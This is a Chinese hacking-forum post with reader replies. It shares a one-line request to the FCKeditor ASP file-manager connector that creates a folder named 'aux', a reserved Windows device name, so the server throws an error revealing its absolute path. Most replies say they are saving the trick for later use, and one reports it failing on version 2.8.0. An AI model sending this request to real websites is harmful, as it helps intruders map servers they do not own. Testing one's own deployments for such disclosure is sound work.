FCKeditor爆绝对路径
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
版本未测试。。。
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
版本未测试。。。
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
评论58次
这个 可以 一用
先收藏,必要的时候拿出来用~
收藏了,很不错的方法
先收之,等要的时候再拿出来!!
收藏了,又多一条技巧,谢谢了
上次不是传国外大黑客发现fck的高危漏洞了么?细节呢?
用特殊文件名的方式,的确可以啊。
拿了。。。
2.8.0测试无效
方法带走了,有时候可能会用上
支持一下~~~~~~~~~
这个不错啊!!!!!!
上周看到了,基于版本限制,还没测试,碰到的都是PHP的。
收集情报有用
看看啊~~好东西
我还没测试过 先顶顶
原理:Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”“com1”“com2”“prn”“con”和“nul”等, 因为这些名字都属于设备名称,等价于一个 DOS 设备,如果我们把文件命名为这些名字,Windows 就会误以为发生重名,所以会提示“不能创建同名的文件”等等。
收藏了好方法
linux下有测试过过吗?